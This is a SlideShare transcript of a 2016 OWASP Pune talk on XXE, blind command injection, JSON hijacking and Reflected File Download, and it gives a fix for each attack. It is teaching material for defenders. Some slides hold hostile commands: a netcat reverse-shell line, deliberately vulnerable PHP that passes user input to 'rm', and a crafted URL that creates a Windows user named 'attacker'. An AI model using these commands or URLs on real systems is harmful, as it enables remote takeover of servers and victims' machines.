Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

OWASP Pune Chapter : Dive Into The Profound Web Attacks

1,502 views

Published on

OWASP Pune Chapter 18th Feb 2016
At - Avaya India, Pune.

Published in: Technology
  • Be the first to comment

OWASP Pune Chapter : Dive Into The Profound Web Attacks

  1. 1. Narendra Bhati - Security Analyst narendra.bhati@outlook.com Dive Into The Profound Web Attacks OWASP Pune Chapter – 18th Feb 2016
  2. 2. Speaker: Narendra Bhati Security Analyst @Suma Soft Pvt. Ltd. – Pune Researcher & Part Time Bug Bounty Hunter Listed in HOF for reporting security Vulnerabilities like Facebook, Google, Mozilla, Twitter etc. Hold more then 12 CVE & 3 Zero days vulnerabilities. Blog – http://websecgeeks.com “Who Am I  - r00tsh3ll”
  3. 3. If you have any questions or query regarding the talk, Kindly note it down. So we can discuss it at the end. 3
  4. 4. Dive Into The Profound Web Attacks • XXE ( XML External Entity Injection) • Blind RCE ( Blind Remote/OS Command Execution ) • JSON Response Hijacking • Reflected File Download
  5. 5. • XXE ( XML External Entity Injection) 5
  6. 6. • XXE ( XML External Entity Injection) According To OWASP An XML External Entity attack is a type of an injection attack against an application that parses XML input. This attack occurs when XML input containing a reference to an external entity is processed by a weakly configured XML parser. This attack may lead to the disclosure of confidential data 6
  7. 7. • XXE ( XML External Entity Injection) Why XXE Take Place ? Failure to validate External XML Entity which gives an attacker the accessing internal resources/data 7
  8. 8. • XXE ( XML External Entity Injection) Lets Have A Demo !  8
  9. 9. • XXE ( XML External Entity Injection) Getting connection from target domain 9 Accessing internal directories. Doing brute forcing or anything we found a directory in localhost called “/betatesting/testing.php” which is a network utility. Invalid directory. Response with failed to load external entity. Valid directory. Response without failed to load external entity or some kind of difference in valid and invalid directory response..
  10. 10. • XXE ( XML External Entity Injection) 10 I am leaving the rest of the process, As per the “testing.php” response. We added a get parameter called “ping” and see we were to able to execute commands. This is a scenario, Where target system have some beta testing application which is under development or etc. You should figured out what you can do with XXE or any other vulnerability
  11. 11. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 11
  12. 12. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 12
  13. 13. • XXE ( XML External Entity Injection) Fixing The XXE Disable XML parser in order to prevent XXE For PHP : bool libxml_disable_entity_loader ([ bool $disable = true ] ) For .Net: settings.XmlResolver = null; Look for the other languages as well. 13
  14. 14. Blind RCE ( Blind Remote/OS Command Execution ) 14
  15. 15. Blind RCE ( Blind Remote/OS Command Execution ) According To Nature/Behaviour  Similar or Elder Brother Of Blind SQL Injection vulnerability. Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application According To OWASP 15
  16. 16. Blind RCE ( Blind Remote/OS Command Execution ) Why RCE Take Place ? Missing/Lack of sanitization of user input, which will append at system shell while execution. 16
  17. 17. Blind RCE ( Blind Remote/OS Command Execution ) Ex. Vulnerable Code As PHP <?php print("Please specify the name of the file to delete"); print("<p>"); $file=$_GET['filename']; system("rm $file"); ?> Injection Point 17
  18. 18. Blind RCE ( Blind Remote/OS Command Execution ) Some Basic About Using Double Commands • A; B = Run A and then B, no matter success execution of A • A || B = Run B if A failed, No matter if B got failed, A will still run • A && B = Run B if A works, If A Failed B will not execute • A & B = Run B and then run A in background, If A failed B will still get executed • A | B = Run A and pass the output of A to B • A %0a B (Use full for web app) • $(nc –nv ip port –e /bin/bash) 18
  19. 19. Blind RCE ( Blind Remote/OS Command Execution ) Demo Time Normal RCE | Some Bypasses | Blind RCE [Low-Medium] 19
  20. 20. Blind RCE ( Blind Remote/OS Command Execution ) Detection On Time Delay Response 20 Response comes in 4 Sec Aprox. Response comes in 11 Sec Aprox.
  21. 21. Blind RCE ( Blind Remote/OS Command Execution ) 21 In demonstration, We are assuming that target server is configured in such a way that he will not send reverse connection using netcat -e option and we cant use wget also. Response from command “id” getting logged in our python simple http server Lets see are we able to access the /var/tmp folder.Yes we are because in python server we got the response as /var/tmp Using similar kind of aproach, We can interact with shell response. Remember we are not using netcat –e option for the response, But we are just piping the output to another machine
  22. 22. Blind RCE ( Blind Remote/OS Command Execution ) Fixing The Command Execution • The developer should scrub all input for malicious characters. • It is much easier to define the legal characters than the illegal characters. 22
  23. 23. JSON Response Hijacking 23
  24. 24. JSON Response Hijacking Similar to CSRF, This vulnerability basically based on Browsers Bug which allow an attacker to steal sensitive JSON response from victim authenticated session or there could be more interesting thing. According To Sources 24
  25. 25. JSON Response Hijacking JSON Hijacking Happened If Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • returns sensitive data. • returns a JSON array. [ content type-json] • responds to GET requests. • the browser making the request has JavaScript enabled (the browser making the request supports the __defineSetter__ method. 25
  26. 26. JSON Response Hijacking Lets Dive Into The Demo 26
  27. 27. JSON Response Hijacking Fixing JSON Hijacking Source - http://haacked.com/archive/2009/06/25/json-hijacking.aspx/ • Only return JSON objects to POST requests. • Prevent the web browser from interpreting the JSON object as valid JavaScript code. • Implement CSRF protection random tokens for all JSON requests. 27
  28. 28. Reflected File Download 28
  29. 29. Reflected File Download According To Sources 29 RFD is a web attack vector that enables attackers to gain complete control over a victims machine by virtually downloading a file from a trusted domain. Recently found in Facebook & Google Etc by researchers. Source- https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
  30. 30. Reflected File Download Reflected: There should be reflection of the value given in the URL as response Filename: File name should allowing or characterized by great or excessive freedom of behavior which should also accept additional user control values and file type. Like application can accept filename between first slash “/” and “?” character. Ex. Code (PHP) (Will Not Work) Lets Separate Those Words 30
  31. 31. Reflected File Download Download : https://anyvulnerablewebsite.com/json;/maliciousfile.bat/.exe?download=anycomm and “malicious.bat/,exe“ So basically this is browser behavior that how he will handle the download process, Mention behavior is for chrome Expect other browsers. Other brewers may have different behavior for the same. Lets Separate Those Words 31
  32. 32. Reflected File Download 1. Attacker send a malicious URL to victim of trusted domain. Ex. http://anytrustedsite.com/apitest/search;setup.bat?term=f00b ar&callback=net user attacker attacker 2. Victim found the domain is trusted. So he will access the URL. 3. After clicking on the URL, The file will be downloaded and after executing that file, Some interesting thing will happened. ;) Attack Scenario 32
  33. 33. Reflected File Download Lets See A Demo 33
  34. 34. Reflected File Download As you can can see we having a web application. The value of download parameter is getting back in response without file name header. And the response is downloadable 34
  35. 35. Reflected File Download Now we are going to enter a file name in url, Because the response header don’t have the file name header. So we have chance that we can control the file name from URL it self. 35
  36. 36. Reflected File Download Now can craft a payload as input which will execute some system command on victim machine. As per the reflection we can separate out the rest of the value to perform a command execution 36
  37. 37. Reflected File Download After executing that file we have calc execution. 37
  38. 38. Reflected File Download Create some interesting payload. Before doing lets check out user accounts. 38
  39. 39. Reflected File Download After executing the downloaded file, We have an another user account called “attacker” 39
  40. 40. Reflected File Download Add - Content-Disposition: attachment; filename=anyfile.pdf/txt Don’t allow the application to take permissive input. Limit the callback function for “;:/” characters. Fixing The Reflected File Download 40
  41. 41. 41 Source-http://www.gapingvoidart.com/gallery/images/142061/any-questions.gif?sw,605,476,0,0,100,16777215,368040352
  42. 42. Thanks, For listening peacefully  Kindly send me your feedback regarding the talk on – narendra.bhati@outlook.com It will help me to improve the presentation next time. 42

×